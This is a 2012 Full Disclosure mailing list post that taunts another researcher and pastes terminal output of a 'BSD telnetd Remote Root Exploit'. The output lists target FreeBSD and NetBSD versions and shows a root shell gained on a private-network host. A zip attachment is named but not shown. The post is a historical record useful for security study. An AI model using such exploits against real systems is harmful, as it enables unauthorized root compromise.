Full Disclosure mailing list archives
xxx
From: trap9 trap9 <taliedge9 () gmail com>
Date: Tue, 26 Jun 2012 18:34:57 +0200
shut up kingcope, fucking bug killer! look what we found fucking whitehat. h4x# /usr/bin/telnet -t 8 192.168.2.8 BSD telnetd Remote Root Exploit *ZERODAY* By Kingcope Year 2011 usage: telnet [-4] [-6] [-8] [-E] [-K] [-L] [-N] [-S tos] [-X atype] [-c] [-d] [-e char] [-k realm] [-l user] [-f/-F] [-n tracefile] [-r] [-s src_addr] [-u] [-P policy] [-y] <-t TARGET_NUMBER> [host-name [port]] TARGETS: 0 FreeBSD 8.2 i386 1 FreeBSD 8.0/8.1/8.2 i386 2 FreeBSD 7.3/7.4 i386 3 FreeBSD 6.2/6.3/6.4 i386 4 FreeBSD 5.3/5.5 i386 5 FreeBSD 4.9/4.11 i386 6 NetBSD 5.0/5.1 i386 7 NetBSD 4.0 i386 8 FreeBSD 8.2 amd64 9 FreeBSD 8.0/8.1 amd64 10 FreeBSD 7.1/7.3/7.4 amd64 11 FreeBSD 7.1 amd64 12 FreeBSD 7.0 amd64 13 FreeBSD 6.4 amd64 14 FreeBSD 6.3 amd64 15 FreeBSD 6.2 amd64 16 FreeBSD 6.1 amd64 17 TESTING i386 18 TESTING amd64 Trying 192.168.2.8... Connected to 192.168.2.8. Escape character is '^]'. Trying SRA secure login: *** EXPLOITING REMOTE TELNETD *** by Kingcope *** Year 2011 USING TARGET -- FreeBSD 8.2 amd64 SC LEN: 30 ALEX-ALEX 6:36PM up 5 mins, 1 user, load averages: 0.01, 0.15, 0.09 USER TTY FROM LOGIN@ IDLE WHAT kcope pts/0 192.168.2.3 6:32PM 4 _su (csh) FreeBSD h4x.Belkin 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Thu Feb 17 02:41:51 UTC 2011 root () mason cse buffalo edu:/usr/obj/usr/src/sys/GENERIC amd64 uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) greetings to divineint
Attachment:
wolverine-final.zip
Description:
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- xxx trap9 trap9 (Jun 27)